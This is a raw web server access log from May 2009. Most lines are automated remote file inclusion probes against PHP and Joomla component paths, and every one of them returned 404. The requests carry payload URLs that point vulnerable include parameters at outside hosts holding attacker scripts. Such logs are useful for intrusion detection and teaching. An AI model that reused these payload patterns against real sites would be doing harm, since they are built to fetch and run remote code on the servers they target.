74.6.8.108 - - [30/May/2009:05:01:07 -0400] "GET /logs/error_log.Q108042000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.36.213.166 - - [30/May/2009:05:01:15 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:01:15 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:01:16 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:01:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [30/May/2009:05:02:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
116.36.213.166 - - [30/May/2009:05:03:00 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:03:12 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:03:23 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:03:23 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
123.125.64.38 - - [30/May/2009:05:03:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.17.162.28 - - [30/May/2009:05:03:29 -0400] "GET /logs/access_log.Q108072400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:03:52 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:03:52 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:03:52 -0400] "GET /logs/access_log.Q108072400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:04:08 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:04:10 -0400] "GET /logs/access_log.Q108072400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:04:10 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:05:55 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:05:55 -0400] "GET //skin/zero_vote/error.php?dir=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:21 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:21 -0400] "GET /logs/access_log.Q109052200//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:21 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:06:32 -0400] "GET /logs/access_log.Q109051000%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:33 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:33 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:33 -0400] "GET /logs/access_log.Q109052200//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:06:33 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:06:33 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:35 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:06:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:05:06:41 -0400] "GET /logs/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:06:41 -0400] "GET /index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:06:41 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:06:52 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:07:10 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:07:14 -0400] "GET /logs/access_log.Q109051000%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:07:14 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.206.183.148 - - [30/May/2009:05:07:18 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.823"
75.125.245.26 - - [30/May/2009:05:07:18 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.206.183.148 - - [30/May/2009:05:07:18 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.823"
75.125.245.26 - - [30/May/2009:05:07:18 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:07:18 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.206.183.148 - - [30/May/2009:05:07:18 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.823"
64.6.231.215 - - [30/May/2009:05:07:21 -0400] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
64.6.231.215 - - [30/May/2009:05:07:21 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/3.0 (OS/2; U)"
72.18.148.82 - - [30/May/2009:05:07:24 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:07:49 -0400] "GET /logs/access_log.Q109052200%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.119.154.129 - - [30/May/2009:05:07:53 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:05:07:53 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:05:07:53 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:05:07:53 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:05:07:54 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
85.119.154.129 - - [30/May/2009:05:07:54 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [30/May/2009:05:07:55 -0400] "GET /logs/access_log.Q109050700%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
91.206.183.148 - - [30/May/2009:05:08:00 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.823"
123.143.98.5 - - [30/May/2009:05:08:03 -0400] "GET /logs/access_log.Q109052200%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.143.98.5 - - [30/May/2009:05:08:03 -0400] "GET /logs/access_log.Q109050700%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.saengcho.hs.kr//bbs/include/pokeh.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:08:06 -0400] "GET /logs/access_log.Q108072400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:08:47 -0400] "GET /logs/access_log.Q108072400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:09:32 -0400] "GET /logs/access_log.Q108072400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:09:47 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:05:10:07 -0400] "GET /logs/access_log.Q109050300/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:10:12 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:05:10:58 -0400] "GET /logs/access_log.Q109050300/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:05:10:58 -0400] "GET /logs/access_log.Q109051000/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:11:35 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:11:35 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:11:35 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:11:35 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:11:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.206.183.148 - - [30/May/2009:05:13:33 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 300 "-" "libwww-perl/5.823"
91.206.183.148 - - [30/May/2009:05:13:33 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.823"
91.206.183.148 - - [30/May/2009:05:13:33 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.823"
83.143.81.26 - - [30/May/2009:05:13:39 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:39 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:39 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:40 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:40 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:40 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:40 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:40 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:40 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:46 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:46 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:47 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:47 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:47 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:47 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:50 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:50 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:13:50 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.206.183.148 - - [30/May/2009:05:13:56 -0400] "GET /logs/error_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.823"
83.143.81.26 - - [30/May/2009:05:14:14 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:15 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:15 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:26 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:27 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:27 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:14:43 -0400] "GET /logs/access_log.Q108070700%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:44 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:44 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:14:46 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:14:48 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:14:48 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:14:48 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:15:01 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:15:06 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:15:06 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:15:06 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:15:10 -0400] "GET /logs/access_log.Q109051600%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
220.181.7.60 - - [30/May/2009:05:15:30 -0400] "GET /logs/access_log.Q108072900 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.17.162.28 - - [30/May/2009:05:16:00 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:16:02 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:16:02 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.119.154.129 - - [30/May/2009:05:16:35 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
